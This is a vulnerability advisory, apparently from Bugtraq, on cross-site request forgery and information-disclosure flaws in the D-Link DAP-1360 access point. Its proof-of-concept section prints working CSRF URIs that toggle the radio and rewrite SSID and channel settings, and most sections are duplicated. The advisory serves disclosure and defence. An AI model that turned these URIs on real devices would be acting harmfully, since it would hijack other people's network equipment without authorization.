D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
BID:71000
Info
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
| Bugtraq ID: | 71000 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 08 2014 12:00AM |
| Updated: | Nov 08 2014 12:00AM |
| Credit: | MustLive |
| Vulnerable: |
D-Link DAP-1360 1.0.0 |
| Not Vulnerable: | |
Discussion
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
D-Link DAP-1360 is prone to multiple cross-site request-forgery vulnerabilities and an information-disclosure vulnerability.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, gaining unauthorized access to the affected device and obtaining sensitive information; other attacks are also possible.
D-Link DAP-1360 is prone to multiple cross-site request-forgery vulnerabilities and an information-disclosure vulnerability.
Exploiting these issues may allow a remote attacker to perform certain administrative actions, gaining unauthorized access to the affected device and obtaining sensitive information; other attacks are also possible.
Exploit / POC
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
Attackers can use a browser to exploit these issues. To exploit the cross-site request-forgery issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}
Attackers can use a browser to exploit these issues. To exploit the cross-site request-forgery issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:true,%22mbssidNum%22:1,%22mbssidCur%22:1}
http://www.example.com/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}
Solution / Fix
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
D-Link DAP-1360 Information Disclosure and Cross Site Request Forgery Vulnerabilities
References:
References:
- D-Link Homepage (D-Link)
- IL and CSRF vulnerabilities in D-Link DAP-1360 (MustLive)